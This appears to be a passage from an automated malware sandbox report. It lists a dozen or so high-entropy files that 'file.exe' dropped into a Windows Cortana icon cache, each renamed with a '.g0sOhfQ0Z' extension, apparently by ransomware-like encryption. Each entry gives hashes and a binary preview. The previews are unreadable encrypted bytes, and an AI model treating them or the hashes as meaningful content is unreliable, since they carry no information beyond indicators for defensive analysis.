                SSDEEP:96:UFifI3Co8WpUzATNN3GyYp2ULqZsyyhd084b01dhF892GHezR:UcfI3Co8jzAjeLbyX01duo
                MD5:62FC00E184CDCA694C6E04F7B17B33CB
                SHA1:22137B19763392F3B35D08036913AFC8FBC76A8B
                SHA-256:391353EA2771F648A91AE1B53FDE05562D84B7B46F6447BE8098EFBA88AE9DA4
                SHA-512:1E52A9217484F35260B5DB498F840CF96A0A6155D03946444E95C377B27A2A3C3E8D999ABBA106C3577A101CABCB68A32561ED2B116F3641319CE55CFB8C21E5
                Malicious:false
                Preview:.agW._..T]h.....A.h...c!..........k...u.w.Xk........X..J...`.7b..7B8..s...xgG$....N*~.{./......bT.....gc].I..<..=..8.V*e..=l&.KbA5...89.....y....RR@..[....e.Ui..?..S.$..`..P..^i$.@..b.@../.j......b..W.\.(......DV..r....S.X.Z{&...c....JV/pZ.}^.....g[.>..}Ru..&.|.._....'9i.5O....\....tRA.i.|..0...V.4O..G..0.Y.-.c....\2.0)C.P0....a....rbA..\g...Y..k..........<....\.U..y.....Ir!W*.,...\..|P..(..%..%K ..~.0,.o.e..v.;...hX[g...^....G,.~.......g2..).M..A$.>.)}.J7.......t}4o.|_.l..g....J....P...k.....z.;~...(...%.>.A...._*...#...4^.Qw...^....n)./iu.....(.d.!.eN..=T.M..u`.N..k..k.:.Y....~.....8*,[...kz..Bjc.C`..u.x)'Y...3.h.'..=..mK..>....`~.`..C...T......N0p...y.N8F.H>...?%sY.V..e*...........2...w.1.w.6.d...y.Tb.ly.$p....%4Cx!W....b..C~GLJ...h...S.~.(..NL.s...hZ.G.i........h:...&..l..}h.g../"..y.!.=*,@.S.ZD....J.....6V..bg~....$Wl.2.......P..N.S..*J....]...&..}m.I.8...)H..Sn...S.If.Yb....{<......=..R~.jv....-......v....y.N+.>..6.Pi..AD.y........

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{116229A7-9A3B-2078-DB5F-B5A20811242C}.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4553
                Entropy (8bit):7.959340333369419
                Encrypted:false
                SSDEEP:96:SnpB3wFeOnpeJrp+uchIiUIqTY5zdRab2f2GHezR:SnpB3wFzIJuIFezLab2fo
                MD5:A6C8C05F620241D218C88C83438C1D54
                SHA1:480A9A0835D8C5CF00D594630A5555DFAECC527E
                SHA-256:22A2F69329AFFAF3A3A72C6E9206EE49AE82F5CFE3332EEB668EE7A404855B7B
                SHA-512:64D2DC90FC79BED164E7D5A6DE71CE022E9DF3933EADE0AB18F68DD85A7545FDF191EAAB08B84CAC97A3DF928A6A0BE6D6941D8771366A249D18402150201382
                Malicious:false
                Preview:...._.s.%...0.k.\9..(...CS._.G....+,I{."M0...yL.s.'....y......r[.X..?...BN.".....,.....M.Kw.M.y=p}.O.8X0fG..s0..|.;w..x..K....QS.i.k..<.8....~j....^.i..~p...4p....$j.H.....\....*...,3.+....U..4..p.?......\...q.....<......H.1....."......AG........y.9.qS....[".h...".........g"...f.....E...n.c].1..+......\............]...h>Y[I<..8.H...+..^l..R.y Y..............D..x..z....S.k.....R.Q.)@.`?X...`.[.u.Q.X.wb.0.{...>.....x.`.>.S..i..."`.....P.M._..L.r..2.@.D\..K-.._.d.3.dLzb._5...%~..y.#G.g...{.Ja..\...(=.......XC..U.Y.} .p..k.R.7.5.LI.}.q:_.A....#.....h..f2./ .0.}......F...<.D...........G........:xq"p).o.e.2..j.Q..+C:..#...yZS..*i:...X..A[.&..I.].n....+.!0...G.@..<U.d..D..gg,0....:.......@M.ey..(..?...E.S...@.F.V..8... ......W.....7..../.....Xd.7-...N.O..@....."t^.4.r..~...w.......H.....d...HQ...=r.k..Ei.M.p.C.....N.{O.p+j_a.I..F...fWv9.X.S.x!...j.8".!...+Z}....._..9~.aG..<0..fN..9..}.$J(....k.....s.)`....*i..M`.....pi=.J..

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{67471CB4-015B-F9E9-FE9B-341BFA6FA6BF}.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4552
                Entropy (8bit):7.960544312976345
                Encrypted:false
                SSDEEP:96:fLEt0//WZTtF92Cz9/rpIVJEVkvrIOH2/88ugqCvgneJ9ZF9C2qd2GHezR:zW0HITd2Cz9/FLWUZ/XPzvgnYB9C2Ko
                MD5:EB94C86640B3AA5F269303DD8DCD216F
                SHA1:FF3996686DDAB00F09762B8A7734A33EE872859C
                SHA-256:9D91AD3CE411BAA1BB3EE28CEF9569199D8865506E637B35DA1FC617CBA16DD1
                SHA-512:A50385ECB51EFE13B23EC62ED24B35DA932A529C39C3800E5ACEFDE97D6A09DA3B95DE51B544BFF2DE45062085FD40E3111B0BF0BC2A82664697156B5182A039
                Malicious:false
                Preview:5.P...~.j...+a.,.*.U.<.,.%....,.M..-72i.:...x7gq'.}........H>....n...E.I....u....O......V'....H....#?A*..xaAV.i,....D..[...w..u1f.,Hl!.pmJ..C.k.?W@...7..M.....D.9_....b:...l.....R..8.....i8)...P.(.Gn.9b.K..._+..o........q.}>p<,.....W...I.Q.~..M8.O.@...9.....PMZ%B.U.L..]>.v..u|.......K.HI.G....m...,Q..ct.....l.....q...h.T..fT. ...c..s.>..b...@.J.tkd:<.i..2..7.,...w.i.!..q....z...P....s.y.'......ES..~o...?....*2_..AR.Y...,..)nq.RDs.eN9.....,Wj*.....x+....W]....<....G...w..>.L.!...Q.m.&...x..Yn...<..s..VQks.W'....6.{\...[.m.....g..>......Q...x...R.D...hb,./.....tX.B.#..V...>...ez.....ug..u..m...t.......q...L.gJs.u.%.(._.... ......x..."...V.....A^........[m......,..mPP...e.w......j&....LR...8.:...6Q..7...(...$..@n.X2....}.&...........n...D.".L.o......J3...9UJ%.....l....... l]i.yD..<...B...l.s.../.....j....G..x}2..y.C..x..!.b.r..].a.t...:...}......i..D.0..@.U.c...`p....pC..v.Bu......]@.8......gz2x.#.>.1...n-.p.H".#.,[2....Q.1...t]E.68S

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{8AA47365-B2B3-1961-69EB-F866E376B12F}.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4557
                Entropy (8bit):7.961155002892807
                Encrypted:false
                SSDEEP:96:l1OZ0UMy/P3hveVzQZWzCC2ZqfxTGryw7X02Ao1N4FZK1RUzF47V+MNZK8tmICwM:DO1/vMVzQZWFX6yw7XmoT8uWzF4RE8tA
                MD5:E628BABE1EFEF0EF8E1B835F9E7145E6
                SHA1:4DF8B8883C2369602BD8DA3FCB3B01773ADFD381
                SHA-256:B8BA140F7594663B38D830D0F9635B8C6160A48757FDBF4CBB83E707853D96D8
                SHA-512:7D9C76CDAA1907848C9DEDC0B78820717D8BE8A13FF538070FEDB0EB329B5FC2D0946A8B6F072AAEBE2D3E208E7DDB089C4432CC3B5E0F04701E5BC292C516A6
                Malicious:false
                Preview:#.|&...Hgs.....]m(...w?q..^p....7..;.*cU.z....R...W..*..N\..`....>..&.j.j..4|...Pf.'a.h]/.....0&NO..X.bH...~.IK9..P.k.W..P...V...a..9..1.o.l..pD&c.6.s......?.kX1..f..k.'.cy...3....50.H..5j.....4.z..g.sl.(.........lR.?.........D.N..(....:O.o..QT.T8i.....%.y....}D.h+I.?R......W.......0^.-..(..s.:....N.........a...y.B.U..g......;..I.E2......;..S.....(bR|..b.iGA..Rc..a..<....NA/mW...y....>H......uN..\......wC.....S!.D.....)h.(...6....P.f...sOyC..G.4*e.b{-r+T.4...x.*^..mJ....(.jV.=j..L...C.}....]-..\...r.g?E'.-.1.....5...O .....//(U./.....(.....11.......0.D..%GN...$..c.y.&gD...'....4.NVR.7.S....!...n"5.u..S.a1I..b..;<..t..=j..........#.}A..~$*..q.C,0(M.`.o..7....$...?....T...U...&..>Eb..+....w. ....%..L....h.f.*.....6.$gh..YA..8p|E...e..k..l..b1...vs(e...izR...9...Fs..ZB......d$.'...4..P5.....=..".zM*..!hJ....'j.....Q.1(,Gf..@..M..K&.g...y..ux2.x..Q.X.WtA..s^,..N..~.v8..zz.$g.c.P.q|.....&5|P.$.JX..'.a.........}&O.e....p..u.F.H......z........~v.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{8ABD94FB-E7D6-84A6-A997-C918EDDE0AE5}.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4556
                Entropy (8bit):7.962047234361829
                Encrypted:false
                SSDEEP:96:HgPtkoCpjBU2rsS6N/HaS/jun4gpc549IGAm3Qm2Q2GHezR:HMt38jXsfHhj3gpG49tAm32Qo
                MD5:D89DD235AEAEC252490A31D35A6C5A08
                SHA1:34FF438BE6848B690B587C24AB5CEDD328A90533
                SHA-256:FBFD5F24F4232C2F92F068166A8817835D45A441ADB5F50E4E5DAEDDDDBBF1CB
                SHA-512:EFF20AF3354B66696E53F9CB65D84D41B78E34E51AFF6D7EB91DC3C7420EEC35ADAAF75A025B606B5B5BE1048AD0F48A53B418C831A2B18D69017AD44C89CDE5
                Malicious:false
                Preview:>...F....HC.... G...7(......8a5d...i?..,..#.=..H./...-..`.....\@m.Qk........".5..#....f.c.|....r...x$...j.$dSJ.2v....(..ZY.O@Q.&..$u.:..k...:...$..$,.|/u..P.(._-..l.%.,.IHx.E.L!o....c.8/..hgO/.q....).."....I..V..Pl.P.)...~....nj...-=_.C.$.......".1M.y[....*.c."..?)...m!K...$e.l.mQC|}.M.......Q.......=.q.55......nl..]w.`S.m,...E.=...]s.\N{.j.il..765t.rM...{7.0.Zy..h...e..{#..6.<-$.....m..aF..0.....6@].....v.........IO...nB.Oir=I.j...7....5..P.T."...Ap..I..o$..F[b.]e6.Q.`'..%...Q..QT).=w,..:u9.u.....{..f"$..,V..X+.?....l^.T.h..........b..8S..P....;....).m.........I...?..&.v..+...#ku.....;...t$IK..C.....'[.Q....h...JG...!....V.P$..bE..+.J.$g.a..\.4.XW....;.sQ._A.....7m.....m~..?.6..7.Z..../....g...7%.u......^s.{..]1...Pvf`..v..p..wj..pnR.G*~.g`.@...X.Q.........D...9.".0J.....41z...y....Y5a=j.....7.D......Pa..D........o...I./..eZ....%.g...x..O....;...,]}.5.......4....1..Rq5...........`......g.7..Ee ?...4u.i....l........Z.@.U."...

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{923DD477-5846-686B-A659-0FCCD73851A8}.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4558
                Entropy (8bit):7.959504626252928
                Encrypted:false
                SSDEEP:96:hK3glHCjovuAcrc0Z1P9Iasya3mTLXojMf1/enVWug9b276Rb2GHezR:sQi03kZVGazogTDjb276Rbo
                MD5:3DEAC5BF61CABD85003B70E1D99C0F7C
                SHA1:1229EFA9F9A86FAEF8941CD9262269277F645137
                SHA-256:FBCACCF89916529413E39A214B9EA780E0426303E5927B565DBE984F80C4817C
                SHA-512:39FB4195A8768495B403BAB7C3DACD61EF7DF65D2C9152AE1A1D84E4C06A6DADFEF4D248F32BFB35B38E4967E9B5BC5D97C33DAB99F8D4281912518C4B335F58
                Malicious:false
                Preview:..53E..)...Sw.....>.+.B.j...n.+..0Yt..'..J.}.......f..X..W.W.o.R...GI.iDd.O....6.S..@M...4&v.[.nVtxW..-..P..n].j....bN..e....!9td.....;...N.)..W...LN.~Z..^O..$.5."...|K..)...4.`.t.#.#.....)b..t..g.r.q..|..o.J.t..n...4.T.+.Q.......q<9.......a.p.)...b...3.....I0.>..F.aR...z\...Ax........p.QpyZX:.&..n.>.8...e.zD.`..Y.8...U.<^c"n.8.Z.......$jP..}i;9H*{^.|..Q........._.=5X~..zi.._x........5.!k..%.l.=....1...~...i.x......8fR.8...Ea....n)..!...H..M.......J...G.:qx$.JS.Z...:'...}.7..."iO..M...........cw.w?! OK.A0...qW...O"6XS..z-.B9.........,.I.|*SAp..a^c.9."....j.~a ....a.P.....P...|..x......g.?...j..J{......s.<-,....yg.M..6\...(i..?r...x-.a..A...`..Y..\.O....H.........p.....B.....t=.d@R`..yT0..$.z....cyp...T..WP..zNe..-.c.X.......S.5.y..e.u..X..eN...........p@UI..."../y.<...<...YY..9Nq...s..N.ir.....t-{.s...L|..4..&c.u...{{..?..Y.W=..Z..+...PXs....|..,.O..t.??q..;&.-.....}.M..?..C.1........q.Q*...M..]..[.<XT.>..;..........A.z.....l...OP.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{BB044BFD-25B7-2FAA-22A8-6371A93E0456}.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4552
                Entropy (8bit):7.95592175012221
                Encrypted:false
                SSDEEP:96:cVaJELRdkj6fdBISneO8nO/IgIB+OYk6yiyNHAwCpTzP2S2GHezR:ORejiB1neOmO/IlB+OYk6yjNHAwATj2r
                MD5:91B67DBABA6E9BC1CF449D099B4D055D
                SHA1:8849B0A77F3694BD39CF09C3B824C4F74FB8FAB7
                SHA-256:525B8FC2C4690B727C04D647EC86B0DBEF37A9FBFBE3E3849300F8F4856A3CDB
                SHA-512:4981014D6D37561812750C4ABB3BED5A898EFADC820F3DA208327C87483E0053AD5385613A478E25AC5A679B289A57AB73E188ED0DA46D3674CCAA844F8FFEFA
                Malicious:false
                Preview:].#n5q........ ..._.....,% .%f.h..............5..e...L.....i..*...\...x.X........kM....?.S....(.7U....&.v.).yH.cj._..."9.?k..h.....K.u.....)W.x..W.j...r...#~...X....u .9..\.BO.\.......x..]..-Iw..3.p4.\.A.h.Y[.F@l..&M.ic.%.L*p..V.....z.y.|E..[>....T.....J..k(.,...0.0....O8....Z)..V.G3...%....O<.|...v........SsE@...o .E..Vms>.....y..}.v.....Pj..0......o............o.,kV....S..$:.V6.H....@m...^a.p...kh...'7o......$...w....<.}...O.;l..Qq.&..8qt.`X.....=V...N......./V.y...R....p.0h......+8..I.. ..S..k5...9#o...v...;i=...0].....o.h`a6...(W......8.NH&/B..Xa.....'k......g..E.&Lu.....Q9w..r.t.....B3"..1..Y_..6...D............cO...;B.....D..K..U._.T5..frs.c.&.0...D@N..iY.../...9p..../../...0. ..N...6..b<G.w....W.B.z..*....Y`...C.q.O..w.../.l......./t...eYd..U@.(.16.G.+.O#7~8Q.-($.!...9...l..zr......qQ..V.D#..HL.$.....|...,'.jK....u..o"t..6...YmfuT.....Zp1|.q.r....L.w.yh......x...Qu.v...v&w..9lw...4w.J...7w.A..-rs..j...c4....`&..5.......G..e...+.8T....

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{BD3F924E-55FB-A1BA-9DE6-B50F9F2460AC}.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4558
                Entropy (8bit):7.959549473670098
                Encrypted:false
                SSDEEP:96:544m3F2O5q4W4k2WYpdu2WDS+8uunmMbZ+IowXnT+fSq2eM42GHezR:up1L59Nu2WDS+smMbZ+IvT+fSq2eM4o
                MD5:F510715F66C1A2E07205E7CFD7243328
                SHA1:E6521B8B9CC764D406C1C674F8DD3CFA2B50FD2A
                SHA-256:FFD29DCEA1EA6E09190AEDCA91F8BFD5A15961F660C897B88BA9AABD5EC75125
                SHA-512:6295AB37973D290B200B2C79FEF5B86A9B9074DC189C28169D1BF30992ABACB77B15C41378D31B991776085BB6D7E8CB3D9D5E71EE02EFAF2126E5C42E230F1C
                Malicious:false
                Preview:.P..Ar..1...k..l......5.M...5F.7g.K.Ly...Z.t....2.....j...iy.W_y...A.@T..m~.;...A6.Qm...0ux..q..n....I..M. J..L...L.Ze \:...Y.H.5..S.}.wT...}...#.0 P'.....{..'...W?.Ik...gV...@....E.H`..&.Q.%.*..(.A..+8......Y..3.wD.........a=U...jE...D.......Z@....6.Mn..>....4a..#n`..~.3Z..9...(.&}1......t.t.v.....qU.g#....{/.....0. ..s....II"...p}..]....6:H.0.[.Z6...m`.?.%.<._&..p..t.D...bpQp\k..np.&...j5.f.B..84Ni..1".(.(.Z=V......O.&.V.... .7W...I..R........zy.h.P.Z.h..d...&.U..*\.;..h..b....p.?....X-.....,..^.;...4...S..8D]..Q..{...;h.....`..O5...v.M.c...eU..}.)h`u..r~.Y.x..4....0...@./ ...f.'..?.<..#..$.+..[.M..f].V..1_F...'....w9...`..n'..zY|[...-_..kHYO2..sou....NQ...`.(x.<...D...[.4z.-|.xu...By..R...G5j..6..A..vl}.n.;.G..eF!8..T...@...KNM.o...?....vA....B.....5<...Q..n......._{............\.@.....QDb.......o......V.1A...*.......l7.".jQ...l...,0.2...H......R`......#Jx......;..!1.eP.o$n.fE....j..C#.[.BWQ..|.+<...4.,Y9.....`.P..LV.j...?f-..

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{C1C6F8AC-40A3-0F5C-146F-65A9DC70BBB4}.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4552
                Entropy (8bit):7.956873282889558
                Encrypted:false
                SSDEEP:96:GYMvajzyB7N5i4V/ircRjTU5cKPVJ5H2J9k2GHezR:qaAhYapuVJN2J9ko
                MD5:BE344B65833270EE8C3CF5DEE69C5789
                SHA1:7413C6749B6C46571DBD10A83D3169619DB379F8
                SHA-256:D4D3BD5FF01EB415C0C900D4D0FF8F5D24FF2B2EE0718F7842B8151165FFC574
                SHA-512:0001F58835671CF456FD83C5DCC4F599A3736BCF4A9F55E215636D41C9AFE42F1AD8C13FCF85F0DBF4B8DCD7ABC934C9680EC86D69A30E48F6355CBA23B1FFC6
                Malicious:false
                Preview:........>....].e..w.......wz...68..V..p.....,..V......0VK-.-R.#................w>..m...}^O.s._..ZtKb.....R1]..M7.g.S`.........)...G....cx.*3.n.~....8.c^.-.m...*.......U.....D@..c....4`..)$..~X.q....B...KM.....".:Rp.....j.ul.dFY....K.D.v3%..b...#....m.f...|A.P.>.E.........2I/.....n.a...y....V..7..3...^&z...us...ue=.....`.vE.-l...%..]0.b..,....3l..>.L..i.a...B.c.f...U..,#....z.a...H.h:.m...ve.i.[...(...Dk.!.@.Y+.k..L..5.nI:Q.....%....Yw.9.^Y..gp.%~.}..`..OD.....Q...\...v.g-I.dS...0s..K..%.....].......m.B^?..j.<..k.5..0..S6...y.+f..*$..........-`6(i.P.......yi..........6.B./....u..........n...'...`g.v$.|3..Pv...l*...P../.H.0ZA3...k....qQ.Mh..$qg$G..c....#..?Mz.f&$%.T.n..Z..^.!...3O.Dam^.a.....w....G.Z....D^..E...e.W...mV.UE;..t...5q.-.AT..+.....cg8 ...3...U[......[.|.D...$.gP_.......J.....t,...\~.F.>...)....uW.;..n...........=.n.X...;uo..;x.0mM:..g..eC;~%.....p....l...e..2v._.4yw..q.|(Z...q..Yp....\..r(..:...u.......ra.Y.....3?z ....5..

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{C804BBA7-FA5F-CBF7-8B55-2096E5F972CB}.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4554
                Entropy (8bit):7.959772205788978
                Encrypted:false
                SSDEEP:96:gOziwK5vfSzqGGGfXOe0ZPFoXEc5M8HeY61C69ACKhiKSEYHzyZF29YO2GHezR:gWilXSzJffPIEM8+Y61baC3vEYH8F21o
                MD5:C174B7162E078F9AE89F0A68831F5DFC
                SHA1:065B06C5C1B2A2769BDCA4885831087F7930AC62
                SHA-256:92A4C8072C29DC2F625063EABD1F4A0AB0376729EFB1C8D3E816AD054CABC77D
                SHA-512:6F7E2EED0AF9C162CF2CD53C42FD94913129622EC79D0C638FF6A7A7990E7964C0AA5C9FC436626BF408DF46C2C007170AE91622646AC693F2523C0A264E9257
                Malicious:false
                Preview:.....P,...3c.Q.k*...&;.."....(....8..x.......f.n......B.?...T..z=.R..Q.R.....t'...i.80.a.......G....R3...._}{.6..M|..Y. P......,.......e.........:z.du.j-.q....g*.4.....M.eH.r../qZ..+>..i+.jf:..[}.l.....v.f..Pn.N.E.#zO..l..Zp....n..4..d ...j.Z..j.t...vV@....Irn..\Xr..<%.6!.E.........7.,..p..n...AE..o.. ..c....0g.l-[2.......J.a.U..Y..vy.8wG....o.G.1..Z.v.......k..SZ.F......D....?...&.|..6W/.O...2ua.]...u5.d...u.....7.b..}...^.q.'G...2>.......1........n......:9...|U.i)~G....f......^.p...B./.XR._.afM..(P..s!o.Sky.he....k......1..H...].X.C~[\.x...6.....}....na...f.\2.K,.5mOe.Q...........U.0..e>l.....F=iR.>..H........o~Mr............uP.$}......t!?'....c.........Tl$....Qb...^x..t...Z{Mw.....o...v...).tFI..s.?..,.....(.-*m....&.Up9i.L.....ik.X8...j.......{H.\.C.R.e3....L:[i.G..$4...Kq.@RS...8....u..*qn..|"A.}.8Z..E..eq.....0.[.dq..n.5......IUYL.%Qop$i4y.l}j....(....e......../....RD.Nm.V."o.@Y/gS.1..64....^\..^u..G1..@. ..X..>.r..k[.....jl..m...i.c

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{DAA168DE-4306-C8BC-8C11-B596240BDDED}.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4557
                Entropy (8bit):7.952313571307514
                Encrypted:false
                SSDEEP:96:BMxY0SKHeTqFdMZ07T97hojxVP7Vh3jh/JPPnKM9PES/5dnJ/SYQFtvh2IP2GHe9:B3Ydc0F72D7VhTbnKCcSBdxg2IPo
                MD5:BFC29483A1C76AB3A400C93F14FDBAF8
                SHA1:CAC91C1A3B6D24249CA8900D9B259348247E0421
                SHA-256:01D9966553C4D0B0DD2658BD13F09A80A1DDD4E4CBF43DA1AB95856E72E79B7D
                SHA-512:20C693FCCF33124D41907B49B6359BFEB04E32106BCA71D68315D396B7366E69E0BF18893B6168B16FC87631202B282386843B9C5C1A0C427ACBC0CD805D505F
                Malicious:false
                Preview:^......yJ........fE.....j.{...W...l....r.(Xy8.I....q.......|o.........B..c.G..?7#.y..cT....|...au......L..V.b.........U.M_."\).#.w./6.g......Z.\..:0..+....<.f|..,...6P..[.A.x....7.......T..Q.Z.~......m.l..#.......[..]*.m......._.....<o...Q...$...}_...Sc,.0.^e..50/i......^RR..Q.bJ...l,.....d..0>..e85.zv.(..p......`.......l.}......h......i..6.].i.....*......+g}..T.........[.=../-..U%a.p.....g..\t.Xa.'v"c.g.5*.....n\....ie.d.j..a.X.S.P-JE.T*......I..S...I.~_...t.@...J......Ts.x.-.0..=.6..x...;..O..c.J+.&8.nn....=L-=[....L=...m.........<..........J".eh.T.i.g..Hz.(...-...{.{G...1}....I...H!.s).1m..j2...\.....T...\..iO.u.u.........]...8}\....o4..\hR_cS..<.@-/.......=<ZK...8.....}.6.H..|EN..7o.^.+..{.a..r......8.Ns..X.u!Y./.B.9...$/.~su...B.x..`.a..v........x....5.....[....}`S........].Q..........[|....S....]o...h.~.q.d.H9%d!f@.....y.....3.M...]...F.T...R...<..a2*st....._....&......p2t.Z4..x..(...C.F...6[..Y.[8LQGVZ.Q....J..2....i.3...c

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{E8B84CFB-B069-BC13-F88F-170904F645E5}.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4556
                Entropy (8bit):7.960588385011814
                Encrypted:false
                SSDEEP:96:xVsprUyL8K9CbHLoxR17Kz7kwwXDE56GIN2d2W+2GHezR:igyLOfoxXk7kw022To
                MD5:29CD4579AC363A42A592E7CB239A61C5
                SHA1:5A4C36BF97614BAA352E1BBD699FD25E5F021911
                SHA-256:F7EF3A01ECFB97954B29C77A6D328698DEF6C176E542057A5A1926BABE5ED75A
                SHA-512:7F4519535DFAF0E944E57193DC56B7B219E9C6EA39C25596B232313B11664D946B942E813F271A6816B9A8FB7B6FC4D443D3FDC350A6A734346440B1A53D6EEB
                Malicious:false
                Preview:..;>.?....2U....+g.....Ld.p..R:..?.WGk....t..O:.^.L.,},a-#....M..$.....=....G..~.4.(..r..<.->...^(.{,..{!}.G.X.^.MB.Y{.}|.k4)_0...G....!.....O....E..D....f.f...,vL..Ed....J.....5S....../.Yv.h.........X.....m}.bG@...W{a..G.$$.|"...V.b[.......qFJ....V.2.TvD.&...W.j..R..K.}..+.].UT=.0.z8B".....|.".Y.W.?rP"4..].....C(o..h..Boj......^......`......_/.......coJ...>0M.-.6..&C.]2..?..7-PX..{.bN.mb. .-..q...8..\.N.O.....K....6.........C.@X..x9..+j.....}z......+./r>...Z....0..~.F.......I...to...l...'0.#--..F^x.....^U:.yf.gT.4WX..2.hC..e..Et...eD.[.fe...j.t...-.8.....c4Y.. M..7t....K.O7..y4u.(/.......7"@A/..d..2..X6]......j..9./L.5..dc....~...v..T.A.H..S..5."../.iQ...k..k..$.A25.g!.Y.b.]?|Ek8...#...4.N:.r's%..z.%..+.!.!..H...#...u....|l....FX!..Z......!ek.X0e.wY.@.3q....R)Z...\..z...R`E%t...PE......w.eH....V.L..s2/w...I.f....^>8.8~.u.au......v..C..k.."&...u.^.q2Y.aP).V.~..1M^Q.[..\.K...."B...0.......Z]B}...+.............f...`x..}K-<....E.C....

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{F4DE281A-828F-1F6E-5CBF-B09D699BAD75}.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4558
                Entropy (8bit):7.963114737632568
                Encrypted:false
                SSDEEP:96:bQLzI9V3gtkUq+UXF7gqmQAEyVCXi3AbXRkccJqOqq3osaMrHj2n0Ne2GHezR:bpmt0xh5AE+C4Abs/H3osT2n0Ao
                MD5:7C6EE39E52ACBA09369C5856D27171F4
                SHA1:07AA206E36CEBAC541044900FA07CAFC959AB85D
                SHA-256:7441DBB80F468B132981BB613B5AFB22903E65DF736C7CDB9EDCD6E9A1FC068E
                SHA-512:98C246314F8DB280BD4FBDB9E9CCBF4C8924BB200A1A3A8B6D293156DF4423A68ECFF75680550419D47EA385E401023464B2D4877E1BAE1333C50CF4A761BAE0
                Malicious:false
                Preview:.r.j....xRFyxdrp..U;U'."D15..p........Z.....,W..Y@.8.Z1*..u.I...!...k.2.<...... .4..}...1...3Z^...=.......F.o...}.*D-..F..,..........y.n~:.............a.....f?..,..W+..\.=.3.m....(..@...8.a.x.h./I..R.>.w..S.\&$..k.k.........7j.#u...8...u.....<..cu.l..*.y..YW...N(z...1...Y.N.!f..*E{........+o.cya...F]....[..^-..6..h...B..sb..d.o.f...P!.4$.W.!..=@..T"...k.;.M?;%e2-...g...m..y...U..i.(V....z..# ZTXd..E...B.N....q-R\.9(z..U$gX...<......#...p.Q9...d...8........W.s. ..x.:..L.1....].m^f......#6.96..B...K.l...KC.`..!..?..!.~4/6.......,0...z.....7.7O.w 7...Nn!T.B.s..J.a....'%.W..z]..Tyf,....?...AW.S.4N...}.Z.=.|...._...2.3H....B....E...a....W.{.;....;.9.k.J/8.$&.E:0...(.YI..J.*....g@cn!y....:I..M...?....W.)..6..kw...a....^...............m....a....#;.>..G.....yd. .E.G....a.L2......z...*..D.%..8f...o2..3...R6.n?J.A4.d.\.o...y.&....O.T.y..@#er......\...NZT..+y.O..ku.:W&xIT....:ka....A.....z.h...^.o.xhl7|....xc*.$o"B.5.e..R.-.[.........H..A

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_BingWeather_8wekyb3d8bbwe!App.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4527
                Entropy (8bit):7.958243221906114
                Encrypted:false
                SSDEEP:96:Z5HrtdPunFQOGGQvMZ+aC+AOleAJ3cBMxE8aghoCcCuV7TtP22GHezR:3LtKOOGGQvMUp6LGoHagSCcTHP2o
                MD5:9F1C97C6609E588153FB614E9A529A51
                SHA1:7534BFEAA34BAAF1D5DC9346F94E968AB6A0C49C
                SHA-256:31B439982C6A07C44010519132EBFEAD6062DE3D6E08D581BD2B3DA788B8AD4F
                SHA-512:5E0B53298CAA02C6B968B2F0190C0DF2660B0331B8A3D81A4B17A06504D94A19CD4F379CF4639EA146D63293FB8502197BFB2A164B1C2406600ACA2AEC4AF05A
                Malicious:false
